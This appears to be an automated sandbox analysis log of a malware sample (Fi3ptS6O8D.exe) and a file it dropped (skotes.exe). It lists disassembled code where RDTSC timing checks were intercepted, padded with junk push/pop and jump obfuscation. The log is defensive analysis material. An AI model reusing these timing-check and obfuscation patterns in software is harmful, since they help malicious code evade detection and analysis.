Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0AC2 second address: 4ED0AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F5064A second address: 4F5066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8124DF87D8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F4090A second address: 4F4095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F8124CF45A3h 0x00000012 pop eax 0x00000013 call 00007F8124CF45A9h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F4095A second address: 4F409A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, 01EA6EC3h 0x00000012 pushfd 0x00000013 jmp 00007F8124DF87D8h 0x00000018 add esi, 5D306988h 0x0000001e jmp 00007F8124DF87CBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F409A1 second address: 4F409C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F409C4 second address: 4F409C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F4071B second address: 4F4073D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F8124CF45A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F4073D second address: 4F40760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F8124DF87D6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F40760 second address: 4F407B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8124CF459Bh 0x00000008 and cx, 707Eh 0x0000000d jmp 00007F8124CF45A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007F8124CF45A0h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F8124CF45A0h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F407B9 second address: 4F407BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F407BF second address: 4F407F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8124CF45A2h 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8124CF45A8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F40C3B second address: 4F40CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8124DF87CCh 0x00000012 add ax, C6A8h 0x00000017 jmp 00007F8124DF87CBh 0x0000001c popfd 0x0000001d mov esi, 7B71D99Fh 0x00000022 popad 0x00000023 push dword ptr [ebp+0Ch] 0x00000026 pushad 0x00000027 mov edi, ecx 0x00000029 pushfd 0x0000002a jmp 00007F8124DF87CCh 0x0000002f or al, 00000008h 0x00000032 jmp 00007F8124DF87CBh 0x00000037 popfd 0x00000038 popad 0x00000039 push dword ptr [ebp+08h] 0x0000003c jmp 00007F8124DF87D6h 0x00000041 push B3E7D177h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F40CBE second address: 4F40CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F40CC2 second address: 4F40CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F40CC8 second address: 4F40D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8124CF459Bh 0x00000009 adc ax, 76AEh 0x0000000e jmp 00007F8124CF45A9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 add dword ptr [esp], 4C192E8Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F8124CF459Fh 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F40D56 second address: 4F40D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF022F second address: 4EF0254 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, di 0x00000009 popad 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8124CF45A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0254 second address: 4EF025A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF025A second address: 4EF026E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF026E second address: 4EF0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0272 second address: 4EF0278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0278 second address: 4EF031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8124DF87D1h 0x00000009 xor ah, FFFFFFE6h 0x0000000c jmp 00007F8124DF87D1h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 jmp 00007F8124DF87CEh 0x0000001c push FFFFFFFEh 0x0000001e pushad 0x0000001f jmp 00007F8124DF87CEh 0x00000024 pushfd 0x00000025 jmp 00007F8124DF87D2h 0x0000002a jmp 00007F8124DF87D5h 0x0000002f popfd 0x00000030 popad 0x00000031 call 00007F8124DF87C9h 0x00000036 pushad 0x00000037 mov ah, dh 0x00000039 popad 0x0000003a push eax 0x0000003b jmp 00007F8124DF87D5h 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 mov bx, 2F90h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF031E second address: 4EF033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, cl 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a mov esi, 2EB7BE43h 0x0000000f mov di, si 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF033B second address: 4EF033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF033F second address: 4EF034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF034D second address: 4EF039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8124DF87D1h 0x00000009 adc ecx, 52891B76h 0x0000000f jmp 00007F8124DF87D1h 0x00000014 popfd 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8124DF87D9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF039B second address: 4EF03A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF03A1 second address: 4EF03E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 0B4BFF5Eh 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F8124DF87CCh 0x00000014 pop esi 0x00000015 popad 0x00000016 xor dword ptr [esp], 7C73515Eh 0x0000001d jmp 00007F8124DF87D1h 0x00000022 mov eax, dword ptr fs:[00000000h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dx, cx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF03E3 second address: 4EF0425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0DA25934h 0x00000008 pushfd 0x00000009 jmp 00007F8124CF459Dh 0x0000000e adc al, FFFFFFF6h 0x00000011 jmp 00007F8124CF45A1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b pushad 0x0000001c mov di, ax 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8124CF459Bh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0425 second address: 4EF044D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 mov si, dx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF044D second address: 4EF04C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007F8124CF45A0h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F8124CF45A0h 0x00000017 push eax 0x00000018 jmp 00007F8124CF459Bh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f jmp 00007F8124CF45A4h 0x00000024 push esi 0x00000025 call 00007F8124CF45A1h 0x0000002a pop eax 0x0000002b pop ebx 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f mov edi, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 mov di, cx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF04C5 second address: 4EF04EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 call 00007F8124DF87CDh 0x0000000e push esi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 mov dx, 6940h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF04EA second address: 4EF053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 7273410Fh 0x00000008 pushfd 0x00000009 jmp 00007F8124CF45A4h 0x0000000e or esi, 6B06AAB8h 0x00000014 jmp 00007F8124CF459Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F8124CF45A6h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ax, bx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF053A second address: 4EF0590 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F8124DF87D4h 0x0000000d sub ax, CF78h 0x00000012 jmp 00007F8124DF87CBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b mov eax, 69127ECBh 0x00000020 popad 0x00000021 mov eax, dword ptr [7743B370h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8124DF87D9h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0590 second address: 4EF0596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0596 second address: 4EF059A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF059A second address: 4EF059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF059E second address: 4EF05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007F8124DF87CFh 0x00000010 xor eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movzx esi, di 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF05C3 second address: 4EF05F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8124CF45A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, ecx 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF05F9 second address: 4EF060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, si 0x00000012 mov dx, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF060F second address: 4EF0615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0615 second address: 4EF0636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0636 second address: 4EF0653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF45A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0653 second address: 4EF0657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0657 second address: 4EF0684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e jmp 00007F8124CF459Dh 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8124CF459Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0684 second address: 4EF06BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8124DF87CAh 0x00000015 adc esi, 19C7FCD8h 0x0000001b jmp 00007F8124DF87CBh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF06BC second address: 4EF075F instructions: 0x00000000 rdtsc 0x00000002 mov si, 778Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov bx, cx 0x0000000c jmp 00007F8124CF459Eh 0x00000011 popad 0x00000012 popad 0x00000013 test eax, eax 0x00000015 jmp 00007F8124CF45A0h 0x0000001a jne 00007F8197143BD0h 0x00000020 jmp 00007F8124CF45A0h 0x00000025 sub eax, eax 0x00000027 pushad 0x00000028 mov di, 9162h 0x0000002c call 00007F8124CF45A3h 0x00000031 pushfd 0x00000032 jmp 00007F8124CF45A8h 0x00000037 xor si, C328h 0x0000003c jmp 00007F8124CF459Bh 0x00000041 popfd 0x00000042 pop eax 0x00000043 popad 0x00000044 mov dword ptr [ebp-20h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F8124CF45A0h 0x0000004f mov dl, al 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF075F second address: 4EF07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [esi] 0x0000000a pushad 0x0000000b mov cx, di 0x0000000e pushad 0x0000000f mov bx, B9CEh 0x00000013 pushfd 0x00000014 jmp 00007F8124DF87CFh 0x00000019 jmp 00007F8124DF87D3h 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [ebp-24h], ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov bh, FEh 0x00000029 movzx eax, dx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF07A4 second address: 4EF07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b jmp 00007F8124CF45A0h 0x00000010 je 00007F8197143A43h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8124CF45A7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF07EF second address: 4EF07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF07F5 second address: 4EF07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF07F9 second address: 4EF022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp ebx, FFFFFFFFh 0x0000000b jmp 00007F8124DF87D7h 0x00000010 jmp 00007F8197247C26h 0x00000015 jne 00007F8124DF87E9h 0x00000017 xor ecx, ecx 0x00000019 mov dword ptr [esi], ecx 0x0000001b mov dword ptr [esi+04h], ecx 0x0000001e mov dword ptr [esi+08h], ecx 0x00000021 mov dword ptr [esi+0Ch], ecx 0x00000024 mov dword ptr [esi+10h], ecx 0x00000027 mov dword ptr [esi+14h], ecx 0x0000002a mov ecx, dword ptr [ebp-10h] 0x0000002d mov dword ptr fs:[00000000h], ecx 0x00000034 pop ecx 0x00000035 pop edi 0x00000036 pop esi 0x00000037 pop ebx 0x00000038 mov esp, ebp 0x0000003a pop ebp 0x0000003b retn 0004h 0x0000003e nop 0x0000003f pop ebp 0x00000040 ret 0x00000041 add esi, 18h 0x00000044 pop ecx 0x00000045 cmp esi, 003956A8h 0x0000004b jne 00007F8124DF87B0h 0x0000004d push esi 0x0000004e call 00007F8124DF9033h 0x00000053 push ebp 0x00000054 mov ebp, esp 0x00000056 push dword ptr [ebp+08h] 0x00000059 call 00007F812999BA0Ah 0x0000005e mov edi, edi 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 pushfd 0x00000064 jmp 00007F8124DF87D8h 0x00000069 add ax, 0008h 0x0000006e jmp 00007F8124DF87CBh 0x00000073 popfd 0x00000074 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0D84 second address: 4EE0DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov di, 3F12h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8124CF45A5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0DA8 second address: 4EE0DCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8124DF87CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0DCF second address: 4EE0DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0DD5 second address: 4EE0E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8124DF87D4h 0x00000014 or eax, 093A7318h 0x0000001a jmp 00007F8124DF87CBh 0x0000001f popfd 0x00000020 pushad 0x00000021 push eax 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DC0FD second address: 7DC122 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124CF45B0h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F8124CF45A8h 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB0A2 second address: 7DB0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB0AA second address: 7DB0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB0B1 second address: 7DB0C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB0C2 second address: 7DB0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8124CF459Ch 0x00000012 jo 00007F8124CF4596h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB23C second address: 7DB273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8124DF87D7h 0x0000000d jmp 00007F8124DF87D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
